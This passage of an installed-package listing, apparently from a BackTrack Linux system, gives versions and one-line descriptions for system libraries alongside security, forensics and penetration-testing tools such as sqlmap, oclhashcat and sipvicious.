client for setting system time from NTP servers
ii obex-data-server
0.4.5-1
D-Bus service for OBEX client and server side functionality
ii obexd
OBEX connectivity. Client and Server.
0.40-bt0
ii obexftp
0.23-1
file transfer utility for devices that use the OBEX protocol
ii oclhashcat
0.25-bt0
GPU based password cracker with nvidia and ati support
ii oclhashcat+
0.04-bt2
GPU based password cracker with crypt md5, DES and Apache MD5 support and a
enhanced rule engine.
ii oclhashcat-lite
0.05-bt0
Very fast single hash GPU based password cracker
ii ohrwurm
ohrwurm is a simple RTP fuzzer.
0.1-bt0
ii oinkmaster
Snort rules manager
2.0-2ubuntu1
ii ollydbg
Windows Debugger Ollydbg 2.01
2.01-bt2
ii onesixtyone
Fast SNMP scanner and bruteforce tool
0.3.2-bt4
ii openjdk-6-jdk
OpenJDK Development Kit (JDK)
6b20-1.9.7-0ubuntu1~10.04.1
ii openjdk-6-jre
OpenJDK Java runtime, using Hotspot JIT
6b20-1.9.7-0ubuntu1~10.04.1
ii openjdk-6-jre-headless
6b20-1.9.7-0ubuntu1~10.04.1
OpenJDK Java runtime, using Hotspot JIT (headless)
ii openjdk-6-jre-lib
6b20-1.9.7-0ubuntu1~10.04.1
OpenJDK Java runtime (architecture independent libraries)
ii openssh-client
1:5.3p1-3ubuntu6
secure shell (SSH) client, for secure access to remote machines
ii openssh-server
1:5.3p1-3ubuntu6
secure shell (SSH) server, for secure access from remote machines
ii openssl
0.9.8k-7ubuntu8.6
Secure Socket Layer (SSL) binary and related cryptographic tools
ii openssl-blacklist
list of blacklisted OpenSSL RSA keys
0.5-2
ii openvpn
virtual private network daemon
2.1.0-1ubuntu1.1
ii openvpn-blacklist
0.4
list of blacklisted OpenVPN RSA shared keys
ii ophcrack
3.3.0-1
Microsoft Windows password cracker using rainbow tables (gui)
ii os-prober
1.38
utility to detect other OSes on a set of drives
ii osvdb
Firefox link to osvdb.org.
1.0-bt1
ii p0f
2.0.8-bt0
A versatile passive OS fingerprinting tool.
ii p7zip
9.04~dfsg.1-1
7zr file archiver with high compression ratio
ii p7zip-full
9.04~dfsg.1-1
7z and 7za file archivers with high compression ratio
ii pack
Password Analysis and Cracking Toolkit
0.0.2-bt0
ii padbuster
0.3-bt1
PadBuster is a Perl script for automating Padding Oracle Attacks.
ii parted
2.2-5ubuntu5.1
The GNU Parted disk partition resizing program
ii pasco
1.0+20040505-5
An Internet Explorer cache forensic analysis tool
ii passwd
1:4.1.4.2-1ubuntu2.2
change and administer password and group data
ii patch
Apply a diff file to an original
2.6-2ubuntu1
ii pbnj
2.04-bt4
PBNJ is a suite of tools to monitor changes on a network over time. It does
this by checking for changes on the target machine(s), which includes the deta
ii pciutils
Linux PCI Utilities
1:3.0.0-4ubuntu17
ii pcscd
1.5.3-1ubuntu4.2
Middleware to access a smart card using PC/SC (daemon side)
ii pdf-parser
0.3.7-bt1
This tool will parse a PDF document to identify the fundamental elements used
in the analyzed file.
ii pdfbook
1.0-bt0
Script to gather facebook artifacts from a pd process memory dump.
ii pdfid
0.0.11-bt0
Will scan a file to look for certain PDF keywords.
ii pdgmail
0.2.0-bt0
Script to gather gmail artifacts from a pd process memory dump.
ii peepdf
0.1-bt1
peepdf is a Python tool to explore PDF files in order to find out if the file
can be harmful or not.
ii perl
5.10.1-8ubuntu2.1
Larry Wall's Practical Extraction and Report Language
ii perl-base
minimal Perl system
5.10.1-8ubuntu2.1
ii perl-cisco-copyconfig
1.4-bt2
Provides methods for manipulating the running-config of devices running IOS
via SNMP directed TFTP.
ii perl-doc
Perl documentation
5.10.1-8ubuntu2.1
ii perl-modules
Core Perl modules
5.10.1-8ubuntu2.1
ii perl-number-bytes-human
Perl module for stuff
0.07-bt1
ii perl-tk
1:804.028-6
Perl module providing the Tk graphics library
ii phonon
4:4.7.0really4.4.2metapackage for the Phonon multimedia framework
ii phonon-backend-xine
4:4.7.0really4.4.2Phonon Xine 1.1.x backend
ii php5
5.3.2-1ubuntu4.9
server-side, HTML-embedded scripting language (metapackage)
ii php5-cli
5.3.2-1ubuntu4.9
command-line interpreter for the php5 scripting language
ii php5-common
5.3.2-1ubuntu4.9
Common files for packages built from the php5 source
ii php5-mysql
MySQL module for php5
5.3.2-1ubuntu4.9
ii php5-sqlite
SQLite module for php5
5.3.2-1ubuntu4.9
ii pkg-config
0.22-1build2
manage compile and link flags for libraries
ii plecost
0.2.2-9beta-bt1
Wordpress finger printer tool, plecost search and retrieve information about
the plugins versions installed in Wordpress systems.
ii plymouth
0.8.2-2ubuntu2.2
graphical boot animation and logger - main package
ii plymouth-label
0.8.2-2ubuntu2.2
graphical boot animation and logger - label control
ii plymouth-theme-script
0.8.2-2ubuntu2.2
graphical boot animation and logger - script theme
ii plymouth-theme-ubuntu-text
0.8.2-2ubuntu2.2
graphical boot animation and logger - ubuntu-logo theme
ii plymouth-x11
0.8.2-2ubuntu2.2
graphical boot animation and logger - X11 interface
ii pm-utils
1.3.0-1ubuntu3
utilities and scripts for power management
ii pnm2ppa
PPM to PPA converter
1.13-0ubuntu1
ii po-debconf
1.0.16
tool for managing templates file translations with gettext
ii policykit-1
0.96-2ubuntu0.1
framework for managing administrative policies and privileges
ii policykit-1-gnome
0.96-2ubuntu2
GNOME authentication agent for PolicyKit-1
ii poppler-utils
0.12.4-0ubuntu5.1
PDF utilitites (based on libpoppler)
rc popularity-contest
1.48ubuntu1
Vote for your favourite packages automatically
ii portaudio19-dev
Portable audio I/O - development files
19+svn20090620-0ubuntu2
ii portmap
RPC port mapper
6.0.0-1ubuntu2.1
ii powerfuzzer
1.0beta-bt1
Powerfuzzer is a highly automated and fully customizable web fuzzer (HTTP
protocol based application fuzzer).
ii powermgmt-base
1.31
Common utils and configs for power management
ii ppp
Point-to-Point Protocol (PPP) - daemon
2.4.5~git20081126t100229-0ubuntu3
ii pppconfig
2.3.18ubuntu2
A text menu based utility for configuring ppp
ii pppoeconf
configures PPPoE/ADSL connections
1.19ubuntu1
ii pref.pl
Parses Prefetch files
1.0-bt0
ii procps
/proc file system utilities
1:3.2.8-1ubuntu4
ii protos-sip
r2-bt1
Evaluate implementation level security and robustness of SIP
ii proxychains
3.1-bt2
a tool that forces any TCP connection made by any given application to follow
through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Support
ii proxytunnel
1.9.0-bt3
Connecting outside through HTTP(S) proxies
ii psfontmgr
0.11.10-4ubuntu1
PostScript font manager -- part of Defoma, Debian Font Manager
ii psmisc
utilities that use the proc file system
22.10-1
ii psutils
1.17-27
A collection of PostScript document handling utilities
ii ptk
2.0-bt2
PTK forensics is a computer forensic framework for the command line tools in
the SleuthKit plus much more software modules.
ii ptunnel
0.71-bt2
Ptunnel is an application that allows you to reliably tunnel TCP connections
to a remote host using ICMP echo request and reply packets, commonly known as
ii pulseaudio
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio sound server
ii pulseaudio-esound-compat
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio ESD compatibility layer
ii pulseaudio-module-x11
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 X11 module for PulseAudio sound server
ii pulseaudio-utils
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 Command line tools for the PulseAudio sound server
ii pwnat
0.3beta-bt4
A tool that allows any number of clients behind NATs to communicate with a
server behind a separate NAT.
ii pwntcha
rev4780-bt3
PWNtcha stands for "Pretend Were Not a Turing Computer but a Human
Antagonist", as well as PWN capTCHAs. This projects goal is to demonstrate
the in
ii pyscard
1.6.12-bt1
pyscard is a python module adding smart cards support to python.
ii pyserial
2.5-bt0
Multiplatform Serial Port Module for Python (Win32, Jython, Linux, BSD and
more)
ii python
2.6.5-0ubuntu1
An interactive high-level object-oriented language (default version)
ii python-apport
apport crash report handling library
1.13.3-0ubuntu2
ii python-apt
Python interface to libapt-pkg
0.7.94.2ubuntu6.2
ii python-beautifulsoup
error-tolerant HTML parser for Python
3.1.0.1-2build1
ii python-cairo
1.8.8-1
Python bindings for the Cairo vector graphics library
ii python-central
0.6.15ubuntu1
register and build utility for Python packages
ii python-clientform
0.2.10-2.1
module for handling HTML forms on the client side
ii python-crypto
2.0.1+dfsg1-4ubuntu2
cryptographic algorithms and protocols for Python
ii python-dbus
0.83.0-1ubuntu3
simple interprocess messaging system (Python interface)
ii python-distutils-extra
enhancements to the Python build system
2.18bzr1
ii python-dnspython
DNS toolkit for Python
1.7.1-1ubuntu0.1
ii python-dpkt
Python packet creation / parsing module
1.6+svn54-1
ii python-dumbnet
1.12-3
A dumb, portable networking library -- python bindings
ii python-extractor
1:0.5-7
extracts meta-data from files of arbitrary type (Python bindings)
ii python-fpconst
0.7.2-4
Utilities for handling IEEE 754 floating point special values
ii python-gconf
2.28.0-1ubuntu1
Python bindings for the GConf configuration database system
ii python-gdbm
GNU dbm database support for Python
2.6.5-0ubuntu2
ii python-geoip
1.2.4-2ubuntu1
Python bindings for the GeoIP IP-to-country resolver library
ii python-glade2
GTK+ bindings: Glade support
2.17.0-0ubuntu2
ii python-gmenu
2.30.0-0ubuntu4
ii python-gnome2
2.28.0-1ubuntu1
Python bindings for the GNOME desktop environment
ii python-gnomeapplet
2.30.0-0ubuntu1.1
Python bindings for the GNOME panel applet library
ii python-gnomecanvas
2.28.0-1ubuntu1
Python bindings for gnomecanvas (debug extension)
ii python-gnupginterface
Python interface to GnuPG (GPG)
0.3.2-9.1
ii python-gnuplot
1.8-1.1
A Python interface to the gnuplot plotting program
ii python-gobject
Python bindings for the GObject library
2.21.1-0ubuntu3
ii python-gtk2
Python bindings for the GTK+ widget set
2.17.0-0ubuntu2
ii python-gtksourceview2
2.10.1-0ubuntu1
Python bindings for the GtkSourceView widget
ii python-httplib2
0.6.0-1
comprehensive HTTP client library written in Python
ii python-imaging
Python Imaging Library
1.1.7-1ubuntu0.1
ii python-imaging-tk
Python Imaging Library - ImageTk Module
1.1.7-1ubuntu0.1
ii python-impacket
0.9.6.0-3
Python module to easily build and dissect network protocols
ii python-iniparse
0.3.1-1
Module to access and modify configuration data in INI files
ii python-launchpadlib
Launchpad web services client library
1.6.0-0ubuntu1
ii python-lazr.restfulclient
0.9.11-1ubuntu1.1
client for lazr.restful-based web services
ii python-lazr.uri
1.0.2-1
library for parsing, manipulating, and generating URIs
ii python-libxml2
Python bindings for the GNOME XML library
ii python-lightblue
cross-platform Bluetooth API for Python
0.3.2-1ubuntu1
ii python-lxml
2.2.4-1
pythonic binding for the libxml2 and libxslt libraries
ii python-minimal
2.6.5-0ubuntu1
A minimal subset of the Python language (default version)
ii python-netaddr
0.7.4-1
manipulation of various common network address notations
ii python-newt
A NEWT module for Python
0.52.10-5ubuntu1
ii python-nltk
2.0~b8-0ubuntu1
Python libraries for natural language processing
ii python-notify
Python bindings for libnotify
0.1.1-2build3
ii python-numpy
1:1.3.0-3build1
Numerical Python adds a fast array facility to the Python language
ii python-oauth
implementation of the OAuth protocol
1.0a~svn1124-0ubuntu2
ii python-openssl
0.10-1
Python wrapper around the OpenSSL library
ii python-pam
A Python interface to the PAM library
0.4.2-12.1ubuntu1
ii python-pcapy
0.10.6-1ubuntu2
Python interface to the libpcap packet capture library
ii python-pefile
1.2.9.1-1
Portable Executable (PE) parsing module for Python
ii python-pexpect
2.3-1build1
Python module for automating interactive applications
ii python-pkg-resources
0.6.10-4ubuntu1
Package Discovery and Resource Access using pkg_resources
ii python-problem-report
1.13.3-0ubuntu2
Python library to handle problem reports
ii python-psyco
Python specializing compiler
1.6-1ubuntu2
ii python-ptrace
Python binding of ptrace library
0.6.3-bt0
ii python-pyasn1
ASN.1 library for Python
0.0.8a-1
ii python-pybonjour
1.1.1-bt4
ybonjour provides a pure-Python interface to Apple Bonjour and compatible DNSSD libraries (such as Avahi).
ii python-pycurl
Python bindings to libcurl
7.19.0-3
ii python-pydot
Python interface to Graphviz's dot
1.0.2-1
ii python-pyicu
0.9-2
Python extension wrapping the ICU C++ API
ii python-pymssql
1.0.2+dfsg-1
Python database access for MS SQL server and Sybase
ii python-pyorbit
2.24.0-5ubuntu3
A Python language binding for the ORBit2 CORBA implementation
ii python-pyparsing
Python parsing module
1.5.2-1ubuntu1
ii python-pypcap
object-oriented Python interface for libpcap
ii python-pyx
0.10-1ubuntu3
Python module for generating PostScript graphics
ii python-qt3
Qt3 bindings for Python
3.18.1-4ubuntu1
ii python-qt4
Python bindings for Qt4
ii python-scipy
scientific tools for Python
0.7.0-2ubuntu0.1
ii python-serial
2.3-1
pyserial - module encapsulating access for the serial port
ii python-simplejson
2.0.9-1build1
Simple, fast, extensible JSON encoder/decoder for Python
ii python-sip
Python/C++ bindings generator runtime library
ii python-smartpm
1.2-5
Python library of the Smart Package Manager
ii python-soappy
SOAP Support for Python
0.12.0-4
ii python-support
1.0.4ubuntu1
automated rebuilding support for Python modules
ii python-svn
1.7.2-2ubuntu1
A(nother) Python interface to Subversion
ii python-tk
2.6.5-0ubuntu2
Tkinter - Writing Tk applications with Python
ii python-twisted-bin
10.0.0-2ubuntu2
Event-based framework for internet applications
ii python-twisted-core
10.0.0-2ubuntu2
Event-based framework for internet applications
ii python-twisted-web
10.0.0-1
An HTTP protocol implementation together with clients and servers
ii python-utidylib
Python wrapper for TidyLib
0.2-3.2ubuntu2
ii python-wadllib
1.1.4-1ubuntu1
Python library for navigating WADL files
ii python-wicd
1.7.0+ds1-2
wired and wireless network manager - Python module
ii python-wxgtk2.8
2.8.10.1-0ubuntu1.2
wxWidgets Cross-platform C++ GUI toolkit (wxPython binding)
ii python-wxversion
2.8.10.1-0ubuntu1.2
wxWidgets Cross-platform C++ GUI toolkit (wxPython version selector)
ii python-xdg
0.18-1ubuntu2
Python library to access freedesktop.org standards
ii python-xkit
0.4.2.2
library for the manipulation of the xorg.conf
ii python-yaml
YAML parser and emitter for Python
3.09-2build1
ii python-zope.interface
Interfaces for Python
3.5.3-1ubuntu2
ii python2
Python 2.7.1
2.7.1-bt2
ii python2.6
2.6.5-1ubuntu6
An interactive high-level object-oriented language (version 2.6)
ii python2.6-minimal
2.6.5-1ubuntu6
A minimal subset of the Python language (version 2.6)
ii python3
3.1.2-0ubuntu1
An interactive high-level object-oriented language (default python3 version)
ii python3-minimal
3.1.2-0ubuntu1
A minimal subset of the Python language (default python3 version)
ii python3.1
3.1.2-0ubuntu3
An interactive high-level object-oriented language (version 3.1)
ii python3.1-minimal
3.1.2-0ubuntu3
A minimal subset of the Python language (version 3.1)
ii pyxplot
0.7.1+1-1
data plotting program producing publication-quality output
ii r8187-driver
Patched IEEE r8187 drivers for 2.6.38
26.1010.0622.2006-bt0
ii radeontool
1.6.1-0ubuntu1
utility to control ATI Radeon backlight functions on laptops
ii rake
a ruby build program
0.8.7-1
ii rar
Archiver for .rar files
1:3.9.b2-1
ii rarian-compat
0.8.1-4ubuntu1
Documentation meta-data library (compatibility tools)
ii rdate
1:1.2-4build1
sets the system's date from a remote host
ii rdesktop
1.6.0-2ubuntu3
RDP client for Windows NT/2000 Terminal Server
ii rdoc1.8
1.8.7.249-2
Generate documentation from Ruby source files (for Ruby 1.8)
ii rdoc1.9.2
Generate documentation from Ruby source files (for Ruby 1.9.2)
ii readline-common
6.1-1
GNU readline and history libraries, common files
ii readpst
0.6.41-bt0
Utility which can convert email messages to both mbox and MH mailbox formats.
ii recordmydesktop
0.3.8.1+svn602-1ubuntu1
Captures audio-video data of a Linux desktop session
ii recordmydesktop-bt
1.0-bt1
Launcher of RecordMyDesktop for BackTrack Report-Tools.
ii recoverjpeg
2.0-bt0
A tool to recover lost files on damaged memory cards or USB drives.
ii reglookup
0.12.0-bt0
RegLookup is an small command line utility for reading and querying Windows
NT-based registries.
ii reiserfsprogs
1:3.6.21-1build1
User-level tools for ReiserFS filesystems
ii revhosts
Vhost enumeration and hackign tool
2.0-bt3
ii rfidiot
1.0a-bt4
RFIDIOt is an open source python library for exploring RFID devices
ii rfuzz
0.9-bt2
RFuzz is a Ruby library to easily test web applications from the outside using
a fast HttpClient and wicked evil RandomGenerator allowing the average prog
ii ri
Ruby Interactive reference (ri)
4.2-2~uorppa0
ii ri1.8
1.8.7.249-2
Ruby Interactive reference (for Ruby 1.8)
ii ri1.9.2
Ruby Interactive reference (for Ruby 1.9.2)
ii rifiuti
A MS Windows recycle bin analysis tool
1.0+20040505-4
ii rinetd
Internet TCP redirection server
0.62-5.1
ii rkhunter
1.3.8-bt1
This tool scans for rootkits, backdoors and local exploits.
ii rpm-common
common files for RPM
4.7.2-1lbuild1
ii rrdtool
1.3.8-1ubuntu1
Time-series data storage and display system (programs)
ii rsync
3.0.7-1ubuntu1.1
fast remote file copy program (like rcp)
ii rsyslog
enhanced multi-threaded syslogd
4.2.0-2ubuntu8.1
ii rtkit
Realtime Policy and Watchdog Daemon
0.6-0ubuntu1
ii rtpbreak
1.3a-bt2
With rtpbreak you can detect, reconstruct and analyze any RTP session.
ii rtpflood
1.0-bt0
Command line tool used to flood any device processing RTP.
ii rtpinject
RTP (Voip) injection tool
1.0-bt1
ii rtpinsertsound
RTP (Voip) securoty tool
3.0-bt1
ii rtpmixsound
RTP (Voip) security tool
3.0-bt1
ii ruby
4.2-2~uorppa0
An interpreter of object-oriented scripting language Ruby
ii ruby-dev
4.2-2~uorppa0
Header files for compiling extension modules for Ruby
ii ruby1.8
1.8.7.249-2
Interpreter of object-oriented scripting language Ruby 1.8
ii ruby1.8-dev
1.8.7.249-2
Header files for compiling extension modules for the Ruby 1.8
ii ruby1.9.2
Interpreter of object-oriented scripting language Ruby 1.9.2
ii ruby1.9.2-dev
Header files for compiling extension modules for the Ruby 1.9.2
ii rubygems
1.3.7-1~uorppa0
package management framework for Ruby libraries/applications
ii rubygems1.8
1.3.7-1~uorppa0
ii rubygems1.9.2
1.3.7-1~uorppa0
ii safecopy
1.6-bt0
A data recovery tool which tries to extract as much data as possible from a
problematic source.
ii samba-common
common files used by both the Samba server and client
ii samba-common-bin
common files used by both the Samba server and client
ii samdump
1.0-bt0
Extracts a Samba-style smbpasswd file directly from an offline copy of the
SAM.
ii samdump2
Dump Windows 2k/NT/XP password hashes
1.1.1-1
ii sapyto
SAP Penetration Testing Framework
0.99-bt0
ii sbd
Secure Backdoor Netcat clone
1.37-bt1
ii scalpel
2.0-bt2
A fast file carver that reads a database of header and footer definitions and
extracts matching files or data fragments from a set of image files or raw d
ii scapy
2.1.0-bt1
Scapy is a powerful packet manipulation tool and supports multiple protocols.
ii screen
4.0.3-14ubuntu1.2
terminal multiplexor with VT100/ANSI terminal emulation
ii screen-resolution-extra
0.13
Extension for the GNOME screen resolution applet
ii scrollkeeper
Transitional package for scrollkeeper
0.8.1-4ubuntu1
ii scrounge-ntfs
0.9-bt0
A data recovery program for NTFS filesystems.
ii sctpscan
12.0-bt2
SCTPscan can scan networks for SCTP aware machines and open ports.
ii securityfocus
Firefox link to SecurityFocus.com.
1.0-bt1
ii sed
The GNU sed stream editor
4.2.1-6
ii sensible-utils
0.0.1ubuntu3
Utilities for sensible alternative selection
ii set
1.3.5-bt4
The Social-Engineer Toolkit (SET) is an open source, python driven tool for
penetration testers.
ii sfuzz
0.7.0alpha-bt2
simple fuzz is exactly what it sounds like - a simple fuzzer. don't mistake
simple with a lack of fuzz capability. this fuzzer has two network modes of op
ii sgml-base
1.26
SGML infrastructure and SGML catalog file support
ii sgml-data
common SGML and XML data
2.0.4
ii shared-mime-info
0.71-1ubuntu2
FreeDesktop.org shared MIME database and spec
ii sharutils
shar, unshar, uuencode, uudecode
1:4.6.3-4
ii shodan
Firefox link to ShodanHQ.com.
1.0-bt2
ii sickfuzz
0.3-bt0
A fuzzer made out of several custom .spk files.
ii siege
2.70-bt1
Siege is an http load testing and benchmarking utility.
ii sipcrack
0.3-bt2
SIPcrack is a suite for sniffing and cracking the digest authentification used
in the SIP protocol
ii sipp
3.2-bt0
SIPp is a free Open Source test tool, traffic generator for the SIP protocol
ii sipsak
0.9.6-bt0
A small command line tool for developers and administrators of Session
Initiation Protocol (SIP) applications.
ii sipscan
0.1-bt1
A fast network scanner for UDP-SIP clients.
ii sipvicious
0.2.6-bt0
SIPVicious suite is a set of tools that can be used to audit SIP based VoIP
systems.
ii skipfish
2.00-bt0
A fully automated, active web application security reconnaissance tool.
ii sleuthkit
3.2.1-bt0
The Sleuth Kit (TSK) is a C library and a collection of command line tools.
Autopsy is a graphical interface to TSK. TSK can be integrated into automated
ii smap
0.6.0-bt0
A simple scanner for SIP enabled devices.
ii smbclient
command-line SMB/CIFS clients for Unix
ii smistrip
extract MIB from text files like RFC
0.4.8+dfsg2-2
ii smtp-user-enum
1.2-bt0
Username guessing tool primarily for use against the default Solaris SMTP
service
ii smtprc
A network open mail relay checker.
2.0.3-bt0
ii smtpscan
0.5-bt0
A tool to guess which MTA is used by sending several "special" SMTP requests.
ii sniffjoke
0.4.1-bt1
SniffJoke is an application for Linux that handle transparently your TCP
connection, delaying, modifyng and inject fake packets inside your
transmission,
ii snmp
SNMP (Simple Network Management Protocol) applications
ii snmp-mibs-downloader
1.0
Install and manage Management Information Base (MIB) files
ii snmpcheck
1.8-bt2
Like to snmpwalk, snmpcheck permits to enumerate information via SNMP
protocol.
ii snmpenum
1.0-bt2
Simple Perl script to enumerate information on Machines that are running SNMP
ii snort
2.8.5.2-2build1
flexible Network Intrusion Detection System
ii snort-common
2.8.5.2-2build1
flexible Network Intrusion Detection System [common files]
ii snort-common-libraries
2.8.5.2-2build1
flexible Network Intrusion Detection System ruleset
ii snort-rules-default
2.8.5.2-2build1
flexible Network Intrusion Detection System ruleset
ii socat
1.7.1.3-bt2
socat is a relay for bidirectional data transfer between two independent data
channels. Each of these data channels may be a file, pipe, device (serial li
ii sox
Swiss army knife of sound processing
14.3.0-1.1build1
ii spamhole
0.4-bt0
spamhole is a fake sopen SMTP relay, intended to stop (some) spam by
convincing spammers that it is delivering spam messages for them, when in fact
it is
ii spike
A powerful network fuzzer.
2.9-bt5
ii sqlbrute
1.0-bt3
Multi-threaded blind SQL injection bruteforcer.
ii sqlite
command line interface for SQLite
2.8.17-6build2
ii sqlite3
A command line interface for SQLite 3
3.6.22-1
ii sqlmap
0.9-bt2
sqlmap is an open source penetration testing tool that automates the process
of detecting and exploiting SQL injection flaws and taking over of back-end d
ii sqlninja
0.2.6-bt0
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web
application that uses Microsoft SQL Server.
ii squashfs-tools
1:4.0-6ubuntu1
Tool to create and append to squashfs filesystems
ii ssidsniff
0.53-bt2
A curses based tool that allows identification, classification and data
capturing of wireless networks. The interface is inspired by the unix top(1)
utili
ii ssl-cert
simple debconf wrapper for OpenSSL
1.0.23ubuntu2
ii ssldump
An SSLv3/TLS network protocol analyzer.
0.9b3-bt0
ii sslh
1.8rc4-bt0
Lets one accept both HTTPS and SSH connections on the same port.
ii sslscan
1.8.2-bt2
SSLScan determines what ciphers are supported on SSL-based services, such as
HTTPS. Furthermore, SSLScan will determine the prefered ciphers of the SSL se
ii sslsniff
0.7-bt0
Designed to MITM all SSL connections on a LAN and dynamically generate certs.
ii sslstrip
0.8-bt0
Transparently hijacks HTTP traffic on a network.
ii stegdetect
0.6-bt0
Stegdetect is an automated tool for detecting steganographic content in
images. It is capable of detecting several different steganographic methods to

emb
ii strace
A system call tracer
4.5.19-2
ii stunnel4
4.35-bt2
The stunnel program is designed to work as an SSL encryption wrapper between
remote client and local (inetd-startable) or remote servers. The goal is to f
ii subversion
Advanced version control system
1.6.6dfsg-2ubuntu1.2
ii sudo
1.7.2p1-1ubuntu5.3
Provide limited super user privileges to specific users
ii swaks
20100211-bt0
A flexible, scriptable, transaction-oriented SMTP test tool.
ii swig
1.3.40-2ubuntu1
Generate scripting interfaces to C/C++ code
ii syslinux
2:3.63+dfsg-2ubuntu3
Bootloader for Linux/i386 using MS-DOS floppies
ii sysv-rc
System-V-like runlevel change mechanism
2.87dsf-4ubuntu17.2
ii sysv-rc-conf
0.99-6
SysV init runlevel configuration tool for the terminal
ii sysvinit-utils
System-V-like utilities
2.87dsf-4ubuntu17.2
ii tar
1.22-2ubuntu1
GNU version of the tar archiving utility
ii tasksel
2.73ubuntu26
Tool for selecting tasks for installation on Debian systems
ii tasksel-data
2.73ubuntu26
Official tasks used for installation of Debian systems
rc tcl8.4
8.4.19-4
Tcl (the Tool Command Language) v8.4 - run-time files
ii tcl8.5
8.5.8-2
Tcl (the Tool Command Language) v8.5 - run-time files
ii tcpd
Wietse Venema's TCP wrapper utilities
7.6.q-18
ii tcpdump
4.1.1-bt6
A powerful command-line packet analyzer.
ii tcpflow
TCP flow recorder
0.21.ds1-6
ii tcpreplay
3.4.4-bt0
Tcpreplay is a suite written by Aaron Turner for UNIX operating systems which
gives you the ability to use previously captured traffic in libpcap format
ii tcptraceroute
1.5beta7-bt3
tcptraceroute is a traceroute implementation using TCP packets.
ii tcpxtract
1.0.1-5
extracts files from network traffic based on file signatures
ii telnet
The telnet client
0.17-36build1
ii testdisk
Powerful free data recovery software.
6.11.3-bt0
ii testssl.sh
1.13-bt1
testssl.sh is a Unix command line tool which checks for the support of weak
and medium (i.e. also weak) SSL ciphers and the old SSL version 2.
ii tex-common
2.06ubuntu0.1
common infrastructure for building and installing TeX
ii texlive-base
TeX Live: Essential programs and files
2009-7
ii texlive-binaries
Binaries for TeX Live
2009-5ubuntu0.2
ii texlive-common
TeX Live: Base component
2009-7
ii texlive-doc-base
TeX Live: TeX Live documentation
2009-2
ii texlive-latex-base
TeX Live: Basic LaTeX packages
2009-7
ii texlive-latex-base-doc
2009-7
TeX Live: Documentation files for texlive-latex-base
ii texlive-luatex
TeX Live: LuaTeX packages
2009-7
ii thc-ipv6
1.4-bt1
A complete tool set to attack the inherent protocol weaknesses of IPV6.
ii thc-pptp-bruter
0.1.4-bt0
Brute force program against pptp vpn endpoints (tcp port 1723).
ii thcsslcheck
0.1-bt2
Windows tool that checks the remote ssl stack for supported ciphers and
version.
ii theharvester
2.0-bt1
theHarvester is a tool for gathering e-mail accounts and subdomain names from
different public sources.
ii time
1.7-23build1
The GNU time program for measuring cpu resource usage
ii tinyproxy
1.8.2-bt1
Tinyproxy is a light-weight HTTP proxy daemon for POSIX operating systems.
Designed from the ground up to be fast and yet small, it is an ideal solution
f
rc tk8.4
8.4.19-4
Tk toolkit for Tcl and X11, v8.4 - run-time files
ii tk8.5
8.5.8-1
Tk toolkit for Tcl and X11, v8.5 - run-time files
ii tofrodos
1.7.8.debian.1-2
Converts DOS <-> Unix text files, alias tofromdos
ii traceroute
2.0.13-bt2
This is a new modern implementation of traceroute(8) utility for Linux
systems.
ii truecrypt
open-source disk encryption software
7.0-bt4
ii tsconf
touch screen library common files
1.0-7build1
ii ttf-dejavu
2.30-2
Metapackage to pull in ttf-dejavu-core and ttf-dejavu-extra
ii ttf-dejavu-core
2.30-2
Vera font family derivate with additional characters
ii ttf-dejavu-extra
2.30-2
Vera font family derivate with additional characters
ii ttf-droid
1.00~b112+dfsg+1-0ubuntu1
handheld device font with extensive style and language support
ii ttf-dustin
20030517-7
Various TrueType fonts from dustismo.com
ii ttf-freefont
20090104-5
Freefont Serif, Sans and Mono Truetype fonts
ii ttf-liberation
1.05.2.20091019-4
Fonts with the same metrics as Times, Arial and Courier
ii ttf-mscorefonts-installer
3.2ubuntu0.1
Installer for Microsoft TrueType core fonts
ii ttf-symbol-replacement
1.2.2-0ubuntu2~lucid1
Free font with the same metrics as Symbol
ii ttf-umefont
Japanese TrueType font, Ume-font
411-1
ii ttf-unfonts-core
Un series Korean TrueType fonts
1.0.1-7ubuntu1
ii tzdata
time zone and daylight-saving time data
2011g-0ubuntu0.10.04
ii tzdata-java
2011g-0ubuntu0.10.04
time zone and daylight-saving time data for use by java runtimes
ii ua-tester
1.06-bt2
his tool is designed to automatically check a given URL using a list of
standard and non-standard User Agent strings provided by the user (1 per
line).
ii ubuntu-keyring
GnuPG keys of the Ubuntu archive
2010.11.09
ii ubuntu-serverguide
The Ubuntu Server Guide
10.04.3
ii ubuntu-system-service
0.1.20.1
Dbus service to set various system-wide configurations
ii ucf
3.0025
Update Configuration File: preserve user changes to config files.
ii udev
151-12.3
rule-based device node and kernel event manager
ii udisks
1.0.1-1ubuntu1
abstraction for enumerating block devices
ii udp.pl
UDP flooder.
1.0-bt2
ii udptunnel
Tunnels TCP over UDP packets.
r16-bt2
ii ufw
0.30pre1-0ubuntu2
program for managing a Netfilter firewall
ii unetbootin-bt
1.0-bt0
UNetbootin allows you to create bootable Live USB drives for Ubuntu, Fedora,
and other Linux distributions without burning a CD.
ii untidy
untidy is general purpose XML Fuzzer.
beta2-bt1
ii unzip
De-archiver for .zip files
6.0-1build1
ii update-inetd
inetd configuration file updater
4.35ubuntu0.1
ii update-manager-core
manage release upgrades
1:0.134.11
ii update-notifier-common
0.99.3
Files shared between update-notifier and adept
ii upower
abstraction for power management
0.9.1-1
ii upstart
event-based init daemon
0.6.5-8
ii ureadahead
Read required files in advance
0.100.0-4.1.3
ii usbmuxd
1.0.2-1ubuntu2
USB multiplexor daemon for iPhone and iPod Touch devices
ii usbutils
Linux USB utilities
0.86-2ubuntu1
ii user-setup
Set up initial user and password
1.28ubuntu7
ii util-linux
Miscellaneous system utilities
2.17.2-0ubuntu1.10.04.2
ii uuid-runtime
2.17.2-0ubuntu1.10.04.2
runtime components for the Universally Unique ID library
ii v86d
0.1.9-1ubuntu1
daemon to run x86 code in an emulated environment
ii vbetool
1.1-2
run real-mode video BIOS code to alter hardware state
ii videojak
2.00-bt3
VideoJak is an IP Video security assessment tool that can simulate a proof of
concept video interception or replay test.
ii vim
Vi IMproved - enhanced vi editor
2:7.2.330-1ubuntu3
ii vim-common
Vi IMproved - Common files
2:7.2.330-1ubuntu3
